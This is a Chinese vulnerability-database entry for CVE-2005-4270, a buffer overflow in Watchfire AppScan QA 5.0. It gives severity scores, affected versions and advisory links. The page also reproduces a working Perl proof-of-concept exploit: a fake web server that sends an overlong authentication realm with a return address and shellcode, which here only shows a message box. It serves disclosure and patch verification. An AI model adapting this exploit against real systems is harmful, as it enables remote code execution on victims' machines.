CVE-2005-4270
CVSS7.5
发布时间 :2005-12-15 15:11:00
修订时间 :2011-03-07 21:27:55
NMCOE    

[原文]Buffer overflow in Watchfire AppScan QA 5.0.609 and 5.0.134 allows remote web servers to execute arbitrary code via an HTTP 401 response with a WWW-Authenticate header containing a long Realm field.


[CNNVD]Watchfire AppScan QA远程缓冲区溢出漏洞(CNNVD-200512-313)

        Watchfire AppScan QA 5.0.609和5.0.134中存在缓冲区溢出漏洞,远程web服务器可以通过HTTP 401响应含有长领域字段的WWW验证标头执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:watchfire:appscan_qa:5.0.134
cpe:/a:watchfire:appscan_qa:5.0.609

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4270
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4270
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-313
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2005/2933
(UNKNOWN)  VUPEN  ADV-2005-2933
http://www.securityfocus.com/bid/15873
(UNKNOWN)  BID  15873
http://www.securityfocus.com/archive/1/archive/1/419586/100/0/threaded
(UNKNOWN)  BUGTRAQ  20051215 CYBSEC - Security Advisory: Watchfire AppScan QA Remote Code Execution
http://www.cybsec.com/vuln/CYBSEC_Security_Advisory_AppScanQA_RemoteCodeExec.pdf
(UNKNOWN)  MISC  http://www.cybsec.com/vuln/CYBSEC_Security_Advisory_AppScanQA_RemoteCodeExec.pdf
http://securitytracker.com/id?1015362
(UNKNOWN)  SECTRACK  1015362
http://secunia.com/advisories/18013
(UNKNOWN)  SECUNIA  18013
http://securityreason.com/securityalert/260
(UNKNOWN)  SREASON  260

- 漏洞信息

Watchfire AppScan QA远程缓冲区溢出漏洞
高危 缓冲区溢出
2005-12-15 00:00:00 2006-01-10 00:00:00
远程  
        Watchfire AppScan QA 5.0.609和5.0.134中存在缓冲区溢出漏洞,远程web服务器可以通过HTTP 401响应含有长领域字段的WWW验证标头执行任意代码。

- 公告与补丁

        

- 漏洞信息 (1374)

Watchfire AppScan QA 5.0.x Remote Code Execution Exploit PoC (EDBID:1374)
windows remote
2005-12-15 Verified
0 Mariano Nuñez
N/A [点击下载]
# Watchfire AppScan QA PoC - Coded by Mariano Nuñez Di Croce @ CYBSEC
# 
# How to use:
#	1. Run this script to setup the fake web server.
#	2. Scan the server with AppScan QA, either in Interactive or Manual mode.
#	3. If you get an "You are vulnerable!" popup, you should upgrade inmediatly.
#
#	PoC developed for Windows 2000 Server SP4.
#

#!/usr/bin/perl -w

use IO::Socket::INET;

# Dissable buffering
$| = 1;

# Define 200 OK Responses
my $res200 = "HTTP/1.1 200 OK\r\nHost: www.test.com\r\nDate: Thu, 01 Nov 2005 14:38:20 GMT\r\nServer: Apache\r\nContent-Length: 26\r\nKeep-Alive: timeout=15, max=100\r\nConnection: Close\r\nContent-Type: text/html; charset=ISO-8859-1\r\n\r\n<a href='/admin'>admin</a>";

# Define the 401 Auth Required Header and Tail
my $res401Head = "HTTP/1.1 401 Authorization Required\r\nHost: www.test.com\r\nDate: Thu, 01 Nov 2005 14:43:53 GMT\r\nServer: Apache\r\nWWW-Authenticate: Basic realm=\"";

my $res401Tail = "Content-Length: 401\r\nKeep-Alive: timeout=15, max=100\r\nConnection: Close\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML2.0//EN\">\r\n<html><head>\r\n<title>401 Authorization Required</title>\r\n</head><body>\r\n<h1>Authorization Required</h1>\r\n<p>This server could not verify that you\r\nare authorized to access the document\r\nrequested.  Either you supplied the wrong\r\ncredentials (e.g., bad password), or your\r\nbrowser doesn't understand how to supply\r\nthe credentials required.</p>\r\n</body></html>";

# Ret - call ebx - in user32.dll (Windows 2000 Server SP4)
my $ret = pack("l", 0x77e11627);

my $scode = "\x31\xd2\xeb\x35\x59\x88\x51\x06\xbb\x21\x02\x59\x7c\x51\xff\xd3\xeb\x33\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb\xab\x0c\x59\x7c\xff\xd3\xeb\x33\x59\x31\xd2\x88\x51\x13\x52\x51\x51\x52\xff\xd0\x31\xd2\x52\xb8\xbe\x69\x59\x7c\xff\xd0\xe8\xc6\xff\xff\xff\x75\x73\x65\x72\x33\x32\x4e\xe8\xc8\xff\xff\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc8\xff\xff\xff\x59\x6f\x75\x20\x61\x72\x65\x20\x76\x75\x6c\x6e\x65\x72\x61\x62\x6c\x65\x21\x4e";

my $resExploit = $res401Head . "\x41"x347 . "\xeb\x06AA". $ret . $scode . "\"\r\n" . $res401Tail;

# Initialization of Fake WebServer
my $srv = IO::Socket::INET->new(LocalPort => 80,
			      	Reuse => 1, 
				Listen => 1 ) || die "Could not create socket: $!\n";

print "Waiting for connections...\n";
							
while ($cli = $srv->accept()) {
	printf "Request from %s\n", $cli->peerhost;	
	while (<$cli>) {
		if (s/(admin)/$1/) {
			# If Request is for "admin", launch the exploit 
			printf "Request for protected resource detected...launching exploit\n";		
			print $cli $resExploit;
		}
		else {
			# Else send a normal response 
			print $cli $res200;	
		}
	}
	close($cli);
}
close($srv);


# milw0rm.com [2005-12-15]
		

- 漏洞信息

21746
Watchfire AppScan QA 401 HTTP Response Overflow
Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-12-15 2005-10-12
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站